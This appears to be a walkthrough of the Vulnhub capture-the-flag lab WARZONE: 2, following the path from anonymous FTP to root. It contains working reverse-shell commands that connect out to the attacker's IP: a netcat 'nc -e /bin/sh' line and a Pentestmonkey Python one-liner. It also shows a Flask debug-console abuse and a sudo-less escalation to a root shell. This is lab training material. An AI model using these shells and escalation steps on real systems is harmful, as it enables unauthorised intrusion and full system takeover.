Vulnhub - WARZONE: 2

Introduction

Enumeration, Flask, Port Forwarding, GTFObins
Created and Tested in Virtual box (NAT network)
Hint : lowercase letters

This is WARZONE: 2 from Vulnhub.

Ports

We’ve got 3 ports - FTP, SSH and 1337. What’s 1337? nmap doesn’t give us much, so let’s netcat it:

root@kali:/opt/vulnhub/warzone2# nc 192.168.1.144 1337
# WARZONE 2 # WARZONE 2 # WARZONE 2 #
{SECRET SYSTEM REMOTE ACCESS}

Okay it’s the SECRET SYSTEM REMOTE ACCESS. Let’s come back to this in a minute.

FTP

We have anonymous access, and there are three PNG images in the folder. One called username, one called password and one called token. The password and username files are images of semaphore flag messages. We can decode them by referring to a semaphore chart, and we derive the combination:

semaphore:signalperson

The token PNG file gives instructions on how to generate a token; essentially it’s a SHA256 hash of the username and password - it comes to:

833ad488464de1a27d512f104b639258e77901f14eab706163063d34054a7b26

1337

With our credentials above we can log in to the secret system using netcat. We can only do 3 commands:

Success Login
[SIGNALS] { ls, pwd, nc}
[semaphore] > pwd
[+] Recognized signal
[+] sending......
/home/flagman
[semaphore] > ls
[+] Recognized signal
[+] sending......

We can’t do ls with a directory, so we can’t list files outside of /home/flagman. However we can do nc with extras, so we can do:

[semaphore] > nc -e /bin/sh 192.168.1.77 1234

And with a listener we get our first shell.

www-data

With some enumeration as www-data we can find an SSH password for flagman:

www-data@warzone2:/home/flagman/warzone2-socket-server$ ls -lash
ls -lash
total 20K
4.0K drwxr-xr-x  2 flagman flagman 4.0K Nov  8 18:25 .
4.0K drwxr-xr-x 16 flagman flagman 4.0K Nov  8 19:17 ..
4.0K -rw-r--r--  1 flagman flagman   34 Nov  8 16:27 .mysshpassword
4.0K -rwxr-xr-x  1 flagman root    3.7K Nov  8 14:59 warzone2.jar
4.0K -rwxr-xr-x  1 flagman flagman   72 Nov  8 17:50 warzone2.sh
www-data@warzone2:/home/flagman/warzone2-socket-server$ cat .my	
cat .mysshpassword 
Did you know that i_hate_signals!

Flagman

Now we can SSH in as flagman. Once we’re there, we find that flagman can run a command as admiral; so let’s do it:

User flagman may run the following commands on warzone2:
    (admiral) NOPASSWD: /usr/bin/python3 /home/admiral/warzone2-app/wrz2-app.py
    
    
    
lagman@warzone2:/home/admiral/warzone2-app$ sudo -u admiral /usr/bin/python3 /home/admiral/warzone2-app/wrz2-app.py
 * Serving Flask app "wrz2-app" (lazy loading)
 * Environment: production
   WARNING: This is a development server. Do not use it in a production deployment.
   Use a production WSGI server instead.
 * Debug mode: on
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
 * Restarting with stat
 * Debugger is active!
 * Debugger PIN: 182-647-262

So, what is this? It’s a Flask app running in debug mode on localhost. We need to get access to it, so we can set up a port forward in Kali:

root@kali:/opt/vulnhub/warzone2# ssh -L 9999:127.0.0.1:5000 flagman@192.168.1.144

And then in Kali we can visit http://localhost:9999/ and get access to the webapp.

Flask

The front page doesn’t give much away:

Warzone 2
Under construction
search result :None

I run a gobuster on localhost:

root@kali:/opt/vulnhub/warzone2# gobuster dir -u http://localhost:9999 -w /usr/share/seclists/Discovery/Web-Content/common.txt

And this finds a directory called /console. We need to enter the PIN we found earlier, and then we can enter python commands into the console.

I use the Pentestmonkey python reverse shell code with a new listener:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.77",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

And now I have a shell as admiral.

Admiral to root

Admiral can run a command as root; specifically, he can use less to read /var/public/warzone-rules.txt. We can exploit this per GTFOBins by running the command and then running !/bin/sh.

admiral@warzone2:/dev/shm$ sudo -u root /usr/bin/less /var/public/warzone-rules.txt
sudo -u root /usr/bin/less /var/public/warzone-rules.txt
# whoami
whoami
root
# cd /root
cd /root
# ls
ls
Desktop  Documents  Downloads  Music  Pictures	Public	Templates  Videos
# cd Desktop
cd Desktop
# ls -lash
ls -lash
total 12K
4.0K drwxr-xr-x  2 root root 4.0K Nov  8 16:41 .
4.0K drwx------ 16 root root 4.0K Nov 14 04:09 ..
4.0K -r--------  1 root root  332 Nov  8 09:59 gold.txt
# cat gold.txt
cat gold.txt
         (                  )
       (  \                /  )
        \  \              /  /
         \  \    ____    /  /
          \  \_ //  \\ _/  /
           \   //    \\   /
            \_(# GOLD #)_/
               \\    //
                \\__//

    FLAG : {# GOLD MEDAL #}
    NAME : WARZONE 2
    BY   : Alienum with <3

Final Thoughts

I really enjoyed this one, it was a cracker. Easily my favourite since Nully 1. Thanks Alienum.